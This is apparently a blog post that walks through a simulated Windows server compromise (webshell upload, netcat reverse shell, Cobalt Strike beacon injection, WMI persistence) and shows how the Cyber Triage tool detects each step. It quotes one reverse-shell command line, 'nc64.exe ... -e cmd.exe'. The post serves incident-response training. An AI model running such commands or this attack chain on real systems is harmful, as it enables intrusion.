Hi Incident Responder
Today, I am going to share experience on using Cyber Triage application on making the triage analysis of an incident.
Compromise Simulation
I made a small simulation of an application server that has been compromised where the adversaries is able to compromise the server by exploiting the web application functionality with the below steps
- Exploiting web application vulnerability of unrestricted file type upload. So, I will upload a php webshell
- With the functionality of the webshell (404.php shell), We will do some enumeration such as browsing the server
- Create reverse shell by uploading nc64.exe to the server and create a reverse shell via the webshell that we have uploaded
- I will create one persistence using WMI technique
- Create a new user with admin privilege
- Disable Firewall
- Install VNC Server and do the remote desktop from my kali linux
Below is the webshell that I use
Reverse Shell
I executed the nc64.exe with parameter cmd.exe
We got a call back from the victim machine for the reverse shell
Cobalt Strike Beacon
After I got the shell, I upgraded the foot hold to the cobalt strike beacon deployment to make it more stealthy.
I also injected one more beacon to mysqld.exe to ensure that I will still have backup connection when the first beacon dies.
Now I have to beacon are connected
WMI Persistence
I use one of the Cobalt Agressor to create the WMI Persistence. I uploaded the beacon file to the C:\Temp\artifact.exe
Install VNC Server
Live Artefact Collection using Cyber Triage Agent
I am going to collect the artefact using the Live collection agent that to be running on the compromise host.
Lets create new incident in Cyber Triage
and Select Live Manual for Collection. This will allow the Cyber Triage to listen to the new connection from the agent to send the artefact
Start the Collection. We will need to copy and run the agent on the compromised host to allow the client collect and send the information back to the Cyber Triage Server
There are two ways for live collection. Using the GUI and Command Line. I am going to use the GUI in the tutorial. Select the Collection Types that you want to do. I will gather everything hence I selected all. Press start to start the collection
While the agent collecting the information. The server will also start correlating the information from the agent. We can see that there are 3 suspicious artefact just below a minutes of collection. It takes less than 5 minutes to collect all the information from the compromised host.
Cyber Triage will give you anomaly indication on every category. It helps to expedite the triaging process.
Detecting the Reverse Shell
Based on the below information that we can see that Cyber Triage correlate some information from various details that conclude this is to be bad activities. We can see that the argument of the nc64.exe 192.168.0.224 9001 -e cmd.exe is the reverse shell command that we executed from the php shell as shown in the picture above (see section reverse shell). We can also identify that the parent of the of cmd.exe is httpd.exe with NT AUTHORITY/SYSTEM privilege which are very suspicious activities
Detecting Malicious User Creation
Cyber Triage also notify us that the cmd.exe was used to create user which is suspicious. It gathered the information from the memory
Active Connection
In the active connection category, We can find that mysqld.exe made an outbound connection to the 192.168.0.224. This is supposed to be suspicious, why database server made an outbound connection. Based on this simulation that we know we injected one of the Cobaltstrike beacon to mysqld.exe process hence we can find this artifact where mysqld.exe (cobalt beacon) connect to the cobalt C2 server. We can manually mark this connection as bad or suspicious which will update Cyber Triage correlation to the artifact related to it.
We can also see that the tvnserver.exe receive an incoming connection from 192.168.0.224 (Kali Linux)
Mark Artefact as Bad/Suspicious
by marking the connection to bad. Cyber Triage will give us hints to any other related artefact that would be also be bad. We can see below graph that active connection, process, user account, file and listening port would also be bad. I marked the mysqld.exe (cobalt beacon) and NT AUTHRORITY/SYSTEM account show that has been compromised
Lets mark the same for the nc64.exe to be also bad. It give us information where is the file was located. We know that I uploaded nc64.exe using the php webshell.
Program Run
Program run is the history of the windows application that has been executed, We can see that this information was extracted from the User Assist information. Cyber Triage helps on correlating the information with the processes information hence we can see that the parent process and arguments when the powershell are available to enhance our analysis.
We know that the powershell was used to download and run cobaltstrike beacon to establish our first connection with CobaltStrike C2
Processes
We can also see that from the processes artifact that mysqld.exe has sub process rundll32.exe. This is the indication of cobalt thread injection. Cobaltstrike uses rundll32.exe for remote thread injection.
Persistence
Cyber Triage flaged our persitence mechanism using wmi technique. There are two analysises justification made by Cyber Triage to flag our persistence those are the application run from non standard path and run from the temp folder
Files
Analyzing the file, We found our web shell under the web application folder. We can mark this as suspicious as Cyber Triage does not flag this. Interestingly, When I marked the web shell, Cyber Triage found a correlation to inbound connection which accessing the file. Yes it is correct that we access the the webshell from our Kali linux.
We also find the nc64.exe that was uploaded from the webshell and written to the web application folder
Time Line
Cyber Ark also gives us a very good timeline functionality that enable us to understand what happened by browsing back the history. It compile the events sequence from various events to make it in one time line table. As shown above that we can see that 6 minutes after the I uploaded the web then I also uploaded nc64.exe
Interestingly that the adversaries (Me) tried multiple times to add new user to the user. We could see what have happened during that period of time until the user has successfully been created.
OS Configuration
Cyber Triage also flaged our activities that disable all firewall rules.
Conclusion
Cyber Triage helps alot on doing the triage analysis during the incident response. It help the incident responder to give context and initial idea what have been wrong in the first hour of incident. Also, Cyber Triage help to standardize the documentation of the analysis that would help the incident responder to pass the information to the next team if required.
The best things is it helps to correlate from many sources into useful information. It is very hard to correlate million of artefacts collected from the the host. Long time back, I collected information using Eric Zimmerman tools, These tools gives a good collection and flexibility but the disadvantage is we need to correlate the information ourself between all those artefact have been collected which for me will not be effective (impossible) to do incident triage to analyze million of artefacts in the first hour (I am sorry Boss). Again, Cyber Triage helps in many things for quick investigation.
Note: I made this post just based on my experience and has not been sponsored by any product. I just want to exercise myself and share some good information.
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 